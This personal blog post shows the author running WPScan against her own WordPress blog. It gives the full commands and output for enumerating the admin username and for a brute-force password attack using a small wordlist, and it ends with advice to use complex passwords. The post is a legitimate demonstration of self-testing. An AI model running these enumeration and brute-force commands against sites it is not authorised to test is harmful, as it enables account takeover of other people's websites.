So this was fun! I installed wpscan on my machine and proceeded to “hack” my WordPress installation.
First, I got the admin username:
root@anna-lenovo:~/wpscan# ruby wpscan.rb --url https://blog.schoolfield.org --enumerate u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 2.7 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ _______________________________________________________________ [+] URL: https://blog.schoolfield.org/ [+] Started: Sun Apr 5 20:22:23 2015 [!] The WordPress 'https://blog.schoolfield.org/readme.html' file exists exposing a version number [!] Full Path Disclosure (FPD) in: 'https://blog.schoolfield.org/wp-includes/rss-functions.php' [+] Interesting header: SERVER: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.4.39 [+] Interesting header: STRICT-TRANSPORT-SECURITY: “max-age=31536000″ [+] Interesting header: X-POWERED-BY: PHP/5.4.39 [+] XML-RPC Interface available under: https://blog.schoolfield.org/xmlrpc.php [!] Upload directory has directory listing enabled: https://blog.schoolfield.org/wp-content/uploads/ [+] WordPress version 4.1.1 identified from meta generator [+] WordPress theme in use: twentyfifteen - v1.0 [+] Name: twentyfifteen - v1.0 | Location: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/ | Readme: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/readme.txt | Style URL: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/style.css | Theme Name: Twenty Fifteen | Theme URI: https://wordpress.org/themes/twentyfifteen | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,... | Author: the WordPress team | Author URI: https://wordpress.org/ [+] Enumerating plugins from passive detection ... [+] No plugins found [+] Enumerating usernames ... [+] Identified the following 1 user/s: +----+-------+------+ | Id | Login | Name | +----+-------+------+ | 1 | anna | anna | +----+-------+------+ [+] Finished: Sun Apr 5 20:22:31 2015 [+] Requests Done: 60 [+] Memory used: 688 KB [+] Elapsed time: 00:00:07
And then, since I knew the password, I put it in /root/pass to make “cracking” it easier. I didn’t want to fool around with a bunch of massive password files, this is just proof of concept.
root@anna-lenovo:~/wpscan# ruby wpscan.rb --url https://blog.schoolfield.org --wordlist /root/pass --username anna _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 2.7 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ _______________________________________________________________ [+] URL: https://blog.schoolfield.org/ [+] Started: Sun Apr 5 20:30:10 2015 [!] The WordPress 'https://blog.schoolfield.org/readme.html' file exists exposing a version number [!] Full Path Disclosure (FPD) in: 'https://blog.schoolfield.org/wp-includes/rss-functions.php' [+] Interesting header: SERVER: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.4.39 [+] Interesting header: STRICT-TRANSPORT-SECURITY: “max-age=31536000″ [+] Interesting header: X-POWERED-BY: PHP/5.4.39 [+] XML-RPC Interface available under: https://blog.schoolfield.org/xmlrpc.php [!] Upload directory has directory listing enabled: https://blog.schoolfield.org/wp-content/uploads/ [+] WordPress version 4.1.1 identified from meta generator [+] WordPress theme in use: twentyfifteen - v1.0 [+] Name: twentyfifteen - v1.0 | Location: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/ | Readme: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/readme.txt | Style URL: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/style.css | Theme Name: Twenty Fifteen | Theme URI: https://wordpress.org/themes/twentyfifteen | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,... | Author: the WordPress team | Author URI: https://wordpress.org/ [+] Enumerating plugins from passive detection ... [+] No plugins found [+] Starting the password brute forcer Brute Forcing 'anna' Time: 00:00:00 <================================================== > (7 / 9) 77.77% ETA: 00:00:00 [SUCCESS] Login : anna Password : <redacted> +----+-------+------+----------+ | Id | Login | Name | Password | +----+-------+------+----------+ | | anna | | <redacted> | +----+-------+------+----------+ [+] Finished: Sun Apr 5 20:30:15 2015 [+] Requests Done: 66 [+] Memory used: 636 KB [+] Elapsed time: 00:00:05
This is why you need to use a complex password!